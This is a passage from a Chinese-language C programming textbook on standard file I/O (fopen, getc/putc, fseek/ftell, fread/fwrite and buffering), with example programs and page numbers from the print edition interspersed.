基本I/O服务。标准高级I/O(standard high-level I/O)使用C库的标准包和 stdio.h头文件定义。因为无法保证所有的操作系统都使用相同的底层I/O模 950 型,C标准只支持标准I/O包。有些实现会提供底层库,但是C标准建立了可 移植的I/O模型,我们主要讨论这些I/O。 13.1.4 标准文件 C程序会自动打开3个文件,它们被称为标准输入(standard input)、标 准输出(standard output)和标准错误输出(standard error output)。在默认 情况下,标准输入是系统的普通输入设备,通常为键盘;标准输出和标准错 误输出是系统的普通输出设备,通常为显示屏。 通常,标准输入为程序提供输入,它是 getchar()和 scanf()使用的文件。 程序通常输出到标准输出,它是putchar()、puts()和printf()使用的文件。第8 章提到的重定向把其他文件视为标准输入或标准输出。标准错误输出提供了 一个逻辑上不同的地方来发送错误消息。例如,如果使用重定向把输出发送 给文件而不是屏幕,那么发送至标准错误输出的内容仍然会被发送到屏幕 上。这样很好,因为如果把错误消息发送至文件,就只能打开文件才能看 到。 951 13.2 标准I/O 与底层I/O相比,标准I/O包除了可移植以外还有两个好处。第一,标准 I/O有许多专门的函数简化了处理不同I/O的问题。例如,printf()把不同形式 的数据转换成与终端相适应的字符串输出。第二,输入和输出都是缓冲的。 也就是说,一次转移一大块信息而不是一字节信息(通常至少512字节)。 例如,当程序读取文件时,一块数据被拷贝到缓冲区(一块中介存储区 域)。这种缓冲极大地提高了数据传输速率。程序可以检查缓冲区中的字 节。缓冲在后台处理,所以让人有逐字符访问的错觉(如果使用底层I/O, 要自己完成大部分工作)。程序清单13.1演示了如何用标准I/O读取文件和 统计文件中的字符数。我们将在后面几节讨论程序清单 13.1 中的一些特 性。该程序使用命令行参数,如果你是Windows用户,在编译后必须在命令 提示窗口运行该程序;如果你是Macintosh用户,最简单的方法是使用 Terminal在命令行形式中编译并运行该程序。或者,如第11章所述,如果在 IDE中运行该程序,可以使用Xcode的Product菜单提供命令行参数。或者也 可以用puts()和fgets()函数替换命令行参数来获得文件名。 程序清单13.1 count.c程序 /* count.c -- 使用标准 I/O */ #include <stdio.h> #include <stdlib.h>  // 提供 exit()的原型 int main(int argc, char *argv []) { int ch;      // 读取文件时,储存每个字符的地方 FILE *fp;   // “文件指针” unsigned long count = 0; 952 if (argc != 2) { printf("Usage: %s filename\n", argv[0]); exit(EXIT_FAILURE); } if ((fp = fopen(argv[1], "r")) == NULL) { printf("Can't open %s\n", argv[1]); exit(EXIT_FAILURE); } while ((ch = getc(fp)) != EOF) { putc(ch, stdout); // 与 putchar(ch); 相同 count++; } fclose(fp); printf("File %s has %lu characters\n", argv[1], count); return 0; } 953 13.2.1 检查命令行参数 首先,程序清单13.1中的程序检查argc的值,查看是否有命令行参数。 如果没有,程序将打印一条消息并退出程序。字符串 argv[0]是该程序的名 称。显式使用 argv[0]而不是程序名,错误消息的描述会随可执行文件名的 改变而自动改变。这一特性在像 UNIX 这种允许单个文件具有多个文件名的 环境中也很方便。但是,一些操作系统可能不识别argv[0],所以这种用法并 非完全可移植。 exit()函数关闭所有打开的文件并结束程序。exit()的参数被传递给一些 操作系统,包括 UNIX、Linux、Windows和MS-DOS,以供其他程序使用。 通常的惯例是:正常结束的程序传递0,异常结束的程序传递非零值。不同 的退出值可用于区分程序失败的不同原因,这也是UNIX和DOS编程的通常 做法。但是,并不是所有的操作系统都能识别相同范围内的返回值。因此, C 标准规定了一个最小的限制范围。尤其是,标准要求0或宏 EXIT_SUCCESS用于表明成功结束程序,宏EXIT_FAILURE用于表明结束程 序失败。这些宏和exit()原型都位于stdlib.h头文件中。 根据ANSI C的规定,在最初调用的main()中使用return与调用exit()的效 果相同。因此,在main(),下面的语句: return 0; 和下面这条语句的作用相同: exit(0); 但是要注意,我们说的是“最初的调用”。如果main()在一个递归程序 中,exit()仍然会终止程序,但是return只会把控制权交给上一级递归,直至 最初的一级。然后return结束程序。return和exit()的另一个区别是,即使在其 他函数中(除main()以外)调用exit()也能结束整个程序。 13.2.2 fopen()函数 954 继续分析程序清单13.1,该程序使用fopen()函数打开文件。该函数声明 在stdio.h中。它的第1个参数是待打开文件的名称,更确切地说是一个包含 改文件名的字符串地址。第 2 个参数是一个字符串,指定待打开文件的模 式。表13.1列出了C库提供的一些模式。 表13.1 fopen()的模式字符串 像UNIX和Linux这样只有一种文件类型的系统,带b字母的模式和不带b 字母的模式相同。 新的C11新增了带x字母的写模式,与以前的写模式相比具有更多特 性。第一,如果以传统的一种写模式打开一个现有文件,fopen()会把该文件 的长度截为 0,这样就丢失了该文件的内容。但是使用带 x字母的写模式, 即使fopen()操作失败,原文件的内容也不会被删除。第二,如果环境允许, x模式的独占特性使得其他程序或线程无法访问正在被打开的文件。 警告 如果使用任何一种"w"模式(不带x字母)打开一个现有文件,该文件的 内容会被删除,以便程序在一个空白文件中开始操作。然而,如果使用带x 字母的任何一种模式,将无法打开一个现有文件。 程序成功打开文件后,fopen()将返回文件指针(file pointer),其他I/O 955 函数可以使用这个指针指定该文件。文件指针(该例中是fp)的类型是指向 FILE的指针,FILE是一个定义在stdio.h中的派生类型。文件指针fp并不指向 实际的文件,它指向一个包含文件信息的数据对象,其中包含操作文件的 I/O函数所用的缓冲区信息。因为标准库中的I/O函数使用缓冲区,所以它们 不仅要知道缓冲区的位置,还要知道缓冲区被填充的程度以及操作哪一个文 件。标准I/O函数根据这些信息在必要时决定再次填充或清空缓冲区。fp指 向的数据对象包含了这些信息(该数据对象是一个 C结构,将在第 14章中 介绍)。 13.2.3 getc()和putc()函数 getc()和putc()函数与getchar()和putchar()函数类似。所不同的是,要告诉 getc()和putc()函数使用哪一个文件。下面这条语句的意思是“从标准输入中 获取一个字符”: ch = getchar(); 然而,下面这条语句的意思是“从fp指定的文件中获取一个字符”: ch = getc(fp); 与此类似,下面语句的意思是“把字符ch放入FILE指针fpout指定的文件 中”: putc(ch, fpout); 在putc()函数的参数列表中,第1个参数是待写入的字符,第2个参数是 文件指针。 程序清单13.1把stdout作为putc()的第2个参数。stdout作为与标准输出相 关联的文件指针,定义在stdio.h中,所以putc(ch, stdout)与putchar(ch)的作用 相同。实际上,putchar()函数一般通过putc()来定义。与此类似,getchar()也 通过使用标准输入的getc()来定义。 956 为何该示例不用 putchar()而要用 putc()?原因之一是为了介绍 putc()函 数;原因之二是,把stdout替换成别的参数,很容易将这段程序改写成文件 输出。 13.2.4 文件结尾 从文件中读取数据的程序在读到文件结尾时要停止。如何告诉程序已经 读到文件结尾?如果 getc()函数在读取一个字符时发现是文件结尾,它将返 回一个特殊值EOF。所以C程序只有在读到超过文件末尾时才会发现文件的 结尾(一些其他语言用一个特殊的函数在读取之前测试文件结尾,C语言不 同)。 为了避免读到空文件,应该使用入口条件循环(不是do while循环)进 行文件输入。鉴于getc() (和其他C输入函数)的设计,程序应该在进入循 环体之前先尝试读取。如下面设计所示: // 设计范例 #1 int ch;      // 用int类型的变量储存EOF FILE * fp; fp = fopen("wacky.txt", "r"); ch = getc(fp);     // 获取初始输入 while (ch != EOF) { putchar(ch); // 处理输入 ch = getc(fp);  // 获取下一个输入 } 957 以上代码可简化为: // 设计范例 #2 int ch; FILE * fp; fp = fopen("wacky.txt", "r"); while (( ch = getc(fp)) != EOF) { putchar(ch); //处理输入 } 由于ch = getc(fp)是while测试条件的一部分,所以程序在进入循环体之 前就读取了文件。不要设计成下面这样: // 糟糕的设计(存在两个问题) int ch; FILE * fp; fp = fopen("wacky.txt", "r"); while (ch != EOF) // 首次使用ch时,它的值尚未确定 { ch = getc(fp);  // 获取输入 putchar(ch);    // 处理输入 958 } 第1个问题是,ch首次与EOF比较时,其值尚未确定。第2个问题是,如 果getc()返回EOF,该循环会把EOF作为一个有效字符处理。这些问题都可以 解决。例如,把ch初始化为一个哑值(dummy value),再把一个if语句加入 到循环中。但是,何必多此一举,直接使用上面的设计范例即可。 其他输入函数也会用到这种处理方案,它们在读到文件结尾时也会返回 一个错误信号(EOF 或 NULL指针)。 13.2.5 fclose()函数 fclose(fp)函数关闭fp指定的文件,必要时刷新缓冲区。对于较正式的程 序,应该检查是否成功关闭文件。如果成功关闭,fclose()函数返回0,否则 返回EOF: if (fclose(fp) != 0) printf("Error in closing file %s\n", argv[1]); 如果磁盘已满、移动硬盘被移除或出现I/O错误,都会导致调用fclose() 函数失败。 13.2.6 指向标准文件的指针 stdio.h头文件把3个文件指针与3个标准文件相关联,C程序会自动打开 这3个标准文件。如表13.2所示: 表13.2 标准文件和相关联的文件指针 这些文件指针都是指向FILE的指针,所以它们可用作标准I/O函数的参 959 数,如fclose(fp)中的fp。接下来,我们用一个程序示例创建一个新文件,并 写入内容。 960 13.3 一个简单的文件压缩程序 下面的程序示例把一个文件中选定的数据拷贝到另一个文件中。该程序 同时打开了两个文件,以"r"模式打开一个,以"w"模式打开另一个。该程序 (程序清单13.2)以保留每3个字符中的第1个字符的方式压缩第1个文件的 内容。最后,把压缩后的文本存入第2个文件。第2个文件的名称是第1个文 件名加上.red后缀(此处的red代表reduced)。使用命令行参数,同时打开多 个文件,以及在原文件名后面加上后缀,都是相当有用的技巧。这种压缩方 式有限,但是也有它的用途(很容易把该程序改成用标准 I/O 而不是命令行 参数提供文件名)。 程序清单13.2 reducto.c程序 // reducto.c –把文件压缩成原来的1/3! #include <stdio.h> #include <stdlib.h>  // 提供 exit()的原型 #include <string.h>  // 提供 strcpy()、strcat()的原型 #define LEN 40 int main(int argc, char *argv []) { FILE *in, *out;  // 声明两个指向 FILE 的指针 int ch; char name[LEN];  // 储存输出文件名 int count = 0; 961 // 检查命令行参数 if (argc < 2) { fprintf(stderr, "Usage: %s filename\n", argv[0]); exit(EXIT_FAILURE); } // 设置输入 if ((in = fopen(argv[1], "r")) == NULL) { fprintf(stderr, "I couldn't open the file \"%s\"\n", argv[1]); exit(EXIT_FAILURE); } // 设置输出 strncpy(name, argv[1], LEN - 5);  // 拷贝文件名 name[LEN - 5] = '\0'; strcat(name, ".red");        // 在文件名后添加.red if ((out = fopen(name, "w")) == NULL) {          // 以写模式打开文件 962 fprintf(stderr, "Can't create output file.\n"); exit(3); } // 拷贝数据 while ((ch = getc(in)) != EOF) if (count++ % 3 == 0) putc(ch, out);// 打印3个字符中的第1个字符 // 收尾工作 if (fclose(in) != 0 || fclose(out) != 0) fprintf(stderr, "Error in closing files\n"); return 0; } 假设可执行文件名是reducto,待读取的文件名为eddy,该文件中包含下 面一行内容: So even Eddy came oven ready. 命令如下: reducto eddy 待写入的文件名为eddy.red。该程序把输出显示在eddy.red中,而不是屏 幕上。打开eddy.red,内容如下: Send money 963 该程序示例演示了几个编程技巧。我们来仔细研究一下。 fprintf()和 printf()类似,但是 fprintf()的第 1 个参数必须是一个文件指 针。程序中使用stderr指针把错误消息发送至标准错误,C标准通常都这么 做。 为了构造新的输出文件名,该程序使用strncpy()把名称eddy拷贝到数组 name中。参数LEN-5为.red后缀和末尾的空字符预留了空间。如果argv[2]字 符串比LEN-5长,就拷贝不了空字符。出现这种情况时,程序会添加空字 符。调用strncpy()后,name中的第1个空字符在调用strcat()函数时,被.red的. 覆盖,生成了eddy.red。程序中还检查了是否成功打开名为eddy.red的文件。 这个步骤在一些环境中相当重要,因为像strange.c.red这样的文件名可能是 无效的。例如,在传统的DOS环境中,不能在后缀名后面添加后缀名(MS- DOS使用的方法是用.red替换现有后缀名,所以strange.c将变成strange.red。 例如,可以用strchr()函数定位(如果有的话),然后只拷贝点前面的部分即 可)。 该程序同时打开了两个文件,所以我们要声明两个 FIFL 指针。注意, 程序都是单独打开和关闭每个文件。同时打开的文件数量是有限的,这个限 制取决于系统和实现,范围一般是10~20。相同的文件指针可以处理不同的 文件,前提是这些文件不需要同时打开。 964 13.4 文件I/O:fprintf()、fscanf()、fgets()和fputs() 前面章节介绍的I/O函数都类似于文件I/O函数。它们的主要区别是,文 件I/O函数要用FILE指针指定待处理的文件。与 getc()、putc()类似,这些函 数都要求用指向 FILE 的指针(如,stdout)指定一个文件,或者使用fopen() 的返回值。 13.4.1 fprintf()和fscanf()函数 文件I/O函数fprintf()和fscanf()函数的工作方式与printf()和scanf()类似, 区别在于前者需要用第1个参数指定待处理的文件。我们在前面用过 fprintf()。程序清单13.3演示了这两个文件I/O函数和rewind()函数的用法。 程序清单13.3 addaword.c程序 /* addaword.c -- 使用 fprintf()、fscanf() 和 rewind() */ #include <stdio.h> #include <stdlib.h> #include <string.h> #define MAX 41 int main(void) { FILE *fp; char words[MAX]; if ((fp = fopen("wordy", "a+")) == NULL) 965 { fprintf(stdout, "Can't open \"wordy\" file.\n"); exit(EXIT_FAILURE); } puts("Enter words to add to the file; press the #"); puts("key at the beginning of a line to terminate."); while ((fscanf(stdin, "%40s", words) == 1) && (words[0] != '#')) fprintf(fp, "%s\n", words); puts("File contents:"); rewind(fp);    /* 返回到文件开始处 */ while (fscanf(fp, "%s", words) == 1) puts(words); puts("Done!"); if (fclose(fp) != 0) fprintf(stderr, "Error closing file\n"); return 0; } 该程序可以在文件中添加单词。使用"a+"模式,程序可以对文件进行读 写操作。首次使用该程序,它将创建wordy文件,以便把单词存入其中。随 后再使用该程序,可以在wordy文件后面添加单词。虽然"a+"模式只允许在 966 文件末尾添加内容,但是该模式下可以读整个文件。rewind()函数让程序回 到文件开始处,方便while循环打印整个文件的内容。注意,rewind()接受一 个文件指针作为参数。 下面是该程序在UNIX环境中的一个运行示例(可执行程序已重命名为 addword): $ addaword Enter words to add to the file; press the Enter key at the beginning of a line to terminate. The fabulous programmer # File contents: The fabulous programmer Done! $ addaword Enter words to add to the file; press the Enter key at the beginning of a line to terminate. enchanted the large 967 # File contents: The fabulous programmer enchanted the large Done! 如你所见,fprintf()和 fscanf()的工作方式与 printf()和 scanf()类似。但 是,与 putc()不同的是,fprintf()和fscanf()函数都把FILE指针作为第1个参 数,而不是最后一个参数。 13.4.2 fgets()和fputs()函数 第11章时介绍过fgets()函数。它的第1个参数和gets()函数一样,也是表 示储存输入位置的地址(char * 类型);第2个参数是一个整数,表示待输 入字符串的大小 [1];最后一个参数是文件指针,指定待读取的文件。下面 是一个调用该函数的例子: fgets(buf, STLEN, fp); 这里,buf是char类型数组的名称,STLEN是字符串的大小,fp是指向 FILE的指针。 fgets()函数读取输入直到第 1 个换行符的后面,或读到文件结尾,或者 读取STLEN-1 个字符(以上面的 fgets()为例)。然后,fgets()在末尾添加一 968 个空字符使之成为一个字符串。字符串的大小是其字符数加上一个空字符。 如果fgets()在读到字符上限之前已读完一整行,它会把表示行结尾的换行符 放在空字符前面。fgets()函数在遇到EOF时将返回NULL值,可以利用这一机 制检查是否到达文件结尾;如果未遇到EOF则之前返回传给它的地址。 fputs()函数接受两个参数:第1个是字符串的地址;第2个是文件指针。 该函数根据传入地址找到的字符串写入指定的文件中。和 puts()函数不同, fputs()在打印字符串时不会在其末尾添加换行符。下面是一个调用该函数的 例子: fputs(buf, fp); 这里,buf是字符串的地址,fp用于指定目标文件。 由于fgets()保留了换行符,fputs()就不会再添加换行符,它们配合得非 常好。如第11章的程序清单11.8所示,即使输入行比STLEN长,这两个函数 依然处理得很好。 969 13.5 随机访问:fseek()和ftell() 有了 fseek()函数,便可把文件看作是数组,在 fopen()打开的文件中直 接移动到任意字节处。我们创建一个程序(程序清单13.4)演示fseek()和 ftell()的用法。注意,fseek()有3个参数,返回int类型的值;ftell()函数返回一 个long类型的值,表示文件中的当前位置。 程序清单13.4 reverse.c程序 /* reverse.c -- 倒序显示文件的内容 */ #include <stdio.h> #include <stdlib.h> #define CNTL_Z '\032'   /* DOS文本文件中的文件结尾标记 */ #define SLEN 81 int main(void) { char file[SLEN]; char ch; FILE *fp; long count, last; puts("Enter the name of the file to be processed:"); scanf("%80s", file); if ((fp = fopen(file, "rb")) == NULL) 970 {                  /* 只读模式  */ printf("reverse can't open %s\n", file); exit(EXIT_FAILURE); } fseek(fp, 0L, SEEK_END);       /* 定位到文件末尾 */ last = ftell(fp); for (count = 1L; count <= last; count++) { fseek(fp, -count, SEEK_END);    /* 回退   */ ch = getc(fp); if (ch != CNTL_Z && ch != '\r') /* MS-DOS 文件 */ putchar(ch); } putchar('\n'); fclose(fp); return 0; } 下面是对一个文件的输出: Enter the name of the file to be processed: 971 Cluv .C ni eno naht ylevol erom margorp a ees reven llahs I taht kniht I 该程序使用二进制模式,以便处理MS-DOS文本和UNIX文件。但是, 在使用其他格式文本文件的环境中可能无法正常工作。 注意 如果通过命令行环境运行该程序,待处理文件要和可执行文件在同一个 目录(或文件夹)中。如果在IDE中运行该程序,具体查找方案序因实现而 异。例如,默认情况下,Microsoft Visual Studio 2012在源代码所在的目录中 查找,而Xcode 4.6则在可执行文件所在的目录中查找。 接下来,我们要讨论3个问题:fseek()和ftell()函数的工作原理、如何使 用二进制流、如何让程序可移植。 13.5.1 fseek()和ftell()的工作原理 fseek()的第1个参数是FILE指针,指向待查找的文件,fopen()应该已打 开该文件。 fseek()的第2个参数是偏移量(offset)。该参数表示从起始点开始要移 动的距离(参见表13.3列出的起始点模式)。该参数必须是一个long类型的 值,可以为正(前移)、负(后移)或0(保持不动)。 fseek()的第3个参数是模式,该参数确定起始点。根据ANSI标准,在 stdio.h头文件中规定了几个表示模式的明示常量(manifest constant),如表 13.3所示。 表13.3 文件的起始点模式 972 旧的实现可能缺少这些定义,可以使用数值0L、1L、2L分别表示这3种 模式。L后缀表明其值是long类型。或者,实现可能把这些明示常量定义在 别的头文件中。如果不确定,请查阅实现的使用手册或在线帮助。 下面是调用fseek()函数的一些示例,fp是一个文件指针: fseek(fp, 0L, SEEK_SET); // 定位至文件开始处 fseek(fp, 10L, SEEK_SET); // 定位至文件中的第10个字节 fseek(fp, 2L, SEEK_CUR); // 从文件当前位置前移2个字节 fseek(fp, 0L, SEEK_END); // 定位至文件结尾 fseek(fp, -10L, SEEK_END); // 从文件结尾处回退10个字节 对于这些调用还有一些限制,我们稍后再讨论。 如果一切正常,fseek()的返回值为0;如果出现错误(如试图移动的距 离超出文件的范围),其返回值为-1。 ftell()函数的返回类型是long,它返回的是当前的位置。ANSI C把它定 义在stdio.h中。在最初实现的UNIX中,ftell()通过返回距文件开始处的字节 数来确定文件的位置。文件的第1个字节到文件开始处的距离是0,以此类 推。ANSI C规定,该定义适用于以二进制模式打开的文件,以文件模式打 开文件的情况不同。这也是程序清单13.4以二进制模式打开文件的原因。 下面,我们来分析程序清单13.4中的基本要素。首先,下面的语句: fseek(fp, 0L, SEEK_END); 973 把当前位置设置为距文件末尾 0 字节偏移量。也就是说,该语句把当前 位置设置在文件结尾。下一条语句: last = ftell(fp); 把从文件开始处到文件结尾的字节数赋给last。 然后是一个for循环: for (count = 1L; count <= last; count++) { fseek(fp, -count, SEEK_END); /* go backward */ ch = getc(fp); } 第1轮迭代,把程序定位到文件结尾的第1个字符(即,文件的最后一个 字符)。然后,程序打印该字符。下一轮迭代把程序定位到前一个字符,并 打印该字符。重复这一过程直至到达文件的第1个字符,并打印。 13.5.2 二进制模式和文本模式 我们设计的程序清单13.4在UNIX和MS-DOS环境下都可以运行。UNIX 只有一种文件格式,所以不需要进行特殊的转换。然而MS-DOS要格外注 意。许多MS-DOS编辑器都用Ctrl+Z标记文本文件的结尾。以文本模式打开 这样的文件时,C 能识别这个作为文件结尾标记的字符。但是,以二进制模 式打开相同的文件时,Ctrl+Z字符被看作是文件中的一个字符,而实际的文 件结尾符在该字符的后面。文件结尾符可能紧跟在Ctrl+Z字符后面,或者文 件中可能用空字符填充,使该文件的大小是256的倍数。在DOS环境下不会 打印空字符,程序清单13.4中就包含了防止打印Ctrl+Z字符的代码。 二进制模式和文本模式的另一个不同之处是:MS-DOS用\r\n组合表示文 974 本文件换行。以文本模式打开相同的文件时,C程序把\r\n“看成”\n。但是, 以二进制模式打开该文件时,程序能看见这两个字符。因此,程序清单13.4 中还包含了不打印\r的代码。通常,UNIX文本文件既没有Ctrl+Z,也没有 \r,所以这部分代码不会影响大部分UNIX文本文件。 ftell()函数在文本模式和二进制模式中的工作方式不同。许多系统的文 本文件格式与UNIX的模型有很大不同,导致从文件开始处统计的字节数成 为一个毫无意义的值。ANSI C规定,对于文本模式,ftell()返回的值可以作 为fseek()的第2个参数。对于MS-DOS,ftell()返回的值把\r\n当作一个字节计 数。 13.5.3 可移植性 理论上,fseek()和ftell()应该符合UNIX模型。但是,不同系统存在着差 异,有时确实无法做到与UNIX模型一致。因此,ANSI对这些函数降低了要 求。下面是一些限制。 在二进制模式中,实现不必支持SEEK_END模式。因此无法保证程序清 单13.4的可移植性。移植性更高的方法是逐字节读取整个文件直到文件末 尾。C 预处理器的条件编译指令(第 16 章介绍)提供了一种系统方法来处 理这种情况。 在文本模式中,只有以下调用能保证其相应的行为。 不过,许多常见的环境都支持更多的行为。 13.5.4 fgetpos()和fsetpos()函数 975 fseek()和 ftell()潜在的问题是,它们都把文件大小限制在 long 类型能表 示的范围内。也许 20亿字节看起来相当大,但是随着存储设备的容量迅猛 增长,文件也越来越大。鉴于此,ANSI C新增了两个处理较大文件的新定 位函数:fgetpos()和 fsetpos()。这两个函数不使用 long 类型的值表示位置, 它们使用一种新类型:fpos_t(代表file position type,文件定位类型)。 fpos_t类型不是基本类型,它根据其他类型来定义。fpos_t 类型的变量或数 据对象可以在文件中指定一个位置,它不能是数组类型,除此之外,没有其 他限制。实现可以提供一个满足特殊平台要求的类型,例如,fpos_t可以实 现为结构。 ANSI C定义了如何使用fpos_t类型。fgetpos()函数的原型如下: int fgetpos(FILE * restrict stream, fpos_t * restrict pos); 调用该函数时,它把fpos_t类型的值放在pos指向的位置上,该值描述了 文件中的一个位置。如果成功,fgetpos()函数返回0;如果失败,返回非0。 fsetpos()函数的原型如下: int fsetpos(FILE *stream, const fpos_t *pos); 调用该函数时,使用pos指向位置上的fpos_t类型值来设置文件指针指向 该值指定的位置。如果成功,fsetpos()函数返回0;如果失败,则返回非0。 fpos_t类型的值应通过之前调用fgetpos()获得。 976 13.6 标准I/O的机理 我们在前面学习了标准I/O包的特性,本节研究一个典型的概念模型, 分析标准I/O的工作原理。 通常,使用标准I/O的第1步是调用fopen()打开文件(前面介绍过,C程 序会自动打开3种标准文件)。fopen()函数不仅打开一个文件,还创建了一 个缓冲区(在读写模式下会创建两个缓冲区)以及一个包含文件和缓冲区数 据的结构。另外,fopen()返回一个指向该结构的指针,以便其他函数知道如 何找到该结构。假设把该指针赋给一个指针变量fp,我们说fopen()函数“打 开一个流”。如果以文本模式打开该文件,就获得一个文本流;如果以二进 制模式打开该文件,就获得一个二进制流。 这个结构通常包含一个指定流中当前位置的文件位置指示器。除此之 外,它还包含错误和文件结尾的指示器、一个指向缓冲区开始处的指针、一 个文件标识符和一个计数(统计实际拷贝进缓冲区的字节数)。 我们主要考虑文件输入。通常,使用标准I/O的第2步是调用一个定义在 stdio.h中的输入函数,如fscanf()、getc()或 fgets()。一调用这些函数,文件中 的数据块就被拷贝到缓冲区中。缓冲区的大小因实现而异,一般是512字节 或是它的倍数,如4096或16384(随着计算机硬盘容量越来越大,缓冲区的 大小也越来越大)。最初调用函数,除了填充缓冲区外,还要设置fp所指向 的结构中的值。尤其要设置流中的当前位置和拷贝进缓冲区的字节数。通 常,当前位置从字节0开始。 在初始化结构和缓冲区后,输入函数按要求从缓冲区中读取数据。在它 读取数据时,文件位置指示器被设置为指向刚读取字符的下一个字符。由于 stdio.h系列的所有输入函数都使用相同的缓冲区,所以调用任何一个函数都 将从上一次函数停止调用的位置开始。 当输入函数发现已读完缓冲区中的所有字符时,会请求把下一个缓冲大 小的数据块从文件拷贝到该缓冲区中。以这种方式,输入函数可以读取文件 977 中的所有内容,直到文件结尾。函数在读取缓冲区中的最后一个字符后,把 结尾指示器设置为真。于是,下一次被调用的输入函数将返回EOF。 输出函数以类似的方式把数据写入缓冲区。当缓冲区被填满时,数据将 被拷贝至文件中。 978 13.7 其他标准I/O函数 ANSI标准库的标准I/O系列有几十个函数。虽然在这里无法一一列举, 但是我们会简要地介绍一些,让读者对它们有一个大概的了解。这里列出函 数的原型,表明函数的参数和返回类型。我们要讨论的这些函数,除了 setvbuf(),其他函数均可在ANSI之前的实现中使用。参考资料V的“新增C99 和C11的标准ANSI C库”中列出了全部的ANSI C标准I/O包。 13.7.1 int ungetc(int c, FILE *fp)函数 int ungetc()函数把c指定的字符放回输入流中。如果把一个字符放回输入 流,下次调用标准输入函数时将读取该字符(见图13.2)。例如,假设要读 取下一个冒号之前的所有字符,但是不包括冒号本身,可以使用 getchar()或 getc()函数读取字符到冒号,然后使用 ungetc()函数把冒号放回输入流中。 ANSI C标准保证每次只会放回一个字符。如果实现允许把一行中的多个字 符放回输入流,那么下一次输入函数读入的字符顺序与放回时的顺序相反。 图13.2 ungets()函数 13.7.2 int fflush()函数 979 fflush()函数的原型如下: int fflush(FILE *fp); 调用fflush()函数引起输出缓冲区中所有的未写入数据被发送到fp指定的 输出文件。这个过程称为刷新缓冲区。如果 fp是空指针,所有输出缓冲区 都被刷新。在输入流中使用fflush()函数的效果是未定义的。只要最近一次操 作不是输入操作,就可以用该函数来更新流(任何读写模式)。 13.7.3 int setvbuf()函数 setvbuf()函数的原型是: int setvbuf(FILE * restrict fp, char * restrict buf, int mode, size_t size); setvbuf()函数创建了一个供标准I/O函数替换使用的缓冲区。在打开文件 后且未对流进行其他操作之前,调用该函数。指针fp识别待处理的流,buf 指向待使用的存储区。如果buf的值不是NULL,则必须创建一个缓冲区。例 如,声明一个内含1024个字符的数组,并传递该数组的地址。然而,如果把 NULL作为buf的值,该函数会为自己分配一个缓冲区。变量size告诉setvbuf() 数组的大小(size_t是一种派生的整数类型,第5章介绍过)。mode的选择如 下:_IOFBF表示完全缓冲(在缓冲区满时刷新);_IOLBF表示行缓冲(在 缓冲区满时或写入一个换行符时);_IONBF表示无缓冲。如果操作成功, 函数返回0,否则返回一个非零值。 假设一个程序要储存一种数据对象,每个数据对象的大小是3000字节。 可以使用setvbuf()函数创建一个缓冲区,其大小是该数据对象大小的倍数。 13.7.4 二进制I/O:fread()和fwrite() 介绍fread()和fwrite()函数之前,先要了解一些背景知识。之前用到的标 准I/O函数都是面向文本的,用于处理字符和字符串。如何要在文件中保存 数值数据?用 fprintf()函数和%f转换说明只是把数值保存为字符串。例如, 下面的代码: 980 double num = 1./3.; fprintf(fp,"%f", num); 把num储存为8个字符:0.333333。使用%.2f转换说明将其储存为4个字 符:0.33,用%.12f转换说明则将其储存为 14 个字符:0.333333333333。改 变转换说明将改变储存该值所需的空间数量,也会导致储存不同的值。把 num 储存为 0.33 后,读取文件时就无法将其恢复为更高的精度。一般而 言, fprintf()把数值转换为字符数据,这种转换可能会改变值。 为保证数值在储存前后一致,最精确的做法是使用与计算机相同的位组 合来储存。因此,double 类型的值应该储存在一个 double 大小的单元中。 如果以程序所用的表示法把数据储存在文件中,则称以二进制形式储存数 据。不存在从数值形式到字符串的转换过程。对于标准 I/O,fread()和 fwrite 函数用于以二进制形式处理数据(见图13.3)。 实际上,所有的数据都是以二进制形式储存的,甚至连字符都以字符码 的二进制表示来储存。如果文件中的所有数据都被解释成字符码,则称该文 件包含文本数据。如果部分或所有的数据都被解释成二进制形式的数值数 据,则称该文件包含二进制数据(另外,用数据表示机器语言指令的文件都 是二进制文件)。 981 图13.3 二进制输出和文本输出 二进制和文本的用法很容易混淆。ANSI C和许多操作系统都识别两种 文件格式:二进制和文本。能以二进制数据或文本数据形式存储或读取信 982 息。可以用二进制模式打开文本格式的文件,可以把文本储存在二进制形式 的文件中。可以调用 getc()拷贝包含二进制数据的文件。然而,一般而言, 用二进制模式在二进制格式文件中储存二进制数据。类似地,最常用的还是 以文本格式打开文本文件中的文本数据(通常文字处理器生成的文件都是二 进制文件,因为这些文件中包含了大量非文本信息,如字体和格式等)。 13.7.5 size_t fwrite()函数 fwrite()函数的原型如下: size_t fwrite(const void * restrict ptr, size_t size, size_t nmemb,FILE * restrict fp); fwrite()函数把二进制数据写入文件。size_t是根据标准C类型定义的类 型,它是sizeof运算符返回的类型,通常是unsigned int,但是实现可以选择 使用其他类型。指针ptr是待写入数据块的地址。size表示待写入数据块的大 小(以字节为单位),nmemb表示待写入数据块的数量。和其他函数一样, fp指定待写入的文件。例如,要保存一个大小为256字节的数据对象(如数 组),可以这样做: char buffer[256]; fwrite(buffer, 256, 1, fp); 以上调用把一块256字节的数据从buffer写入文件。另举一例,要保存一 个内含10个double类型值的数组,可以这样做: double earnings[10]; fwrite(earnings, sizeof(double), 10, fp); 以上调用把earnings数组中的数据写入文件,数据被分成10块,每块都 是double的大小。 983 注意fwrite()原型中的const void * restrict ptr声明。fwrite()的一个问题 是,它的第1个参数不是固定的类型。例如,第1个例子中使用buffer,其类 型是指向char的指针;而第2个例子中使用earnings,其类型是指向double的 指针。在ANSI C函数原型中,这些实际参数都被转换成指向void的指针类 型,这种指针可作为一种通用类型指针(在ANSI C之前,这些参数使用char *类型,需要把实参强制转换成char *类型)。 fwrite()函数返回成功写入项的数量。正常情况下,该返回值就是 nmemb,但如果出现写入错误,返回值会比nmemb小。 13.7.6 size_t fread()函数 size_t fread()函数的原型如下: size_t fread(void * restrict ptr, size_t size, size_t nmemb,FILE * restrict fp); fread()函数接受的参数和fwrite()函数相同。在fread()函数中,ptr是待读 取文件数据在内存中的地址,fp指定待读取的文件。该函数用于读取被 fwrite()写入文件的数据。例如,要恢复上例中保存的内含10个double类型值 的数组,可以这样做: double earnings[10]; fread(earnings, sizeof (double), 10, fp); 该调用把10个double大小的值拷贝进earnings数组中。 fread()函数返回成功读取项的数量。正常情况下,该返回值就是 nmemb,但如果出现读取错误或读到文件结尾,该返回值就会比nmemb小。 13.7.7 int feof(FILE *fp)和int ferror(FILE *fp)函数 如果标准输入函数返回 EOF,则通常表明函数已到达文件结尾。然 而,出现读取错误时,函数也会返回EOF。feof()和ferror()函数用于区分这 984 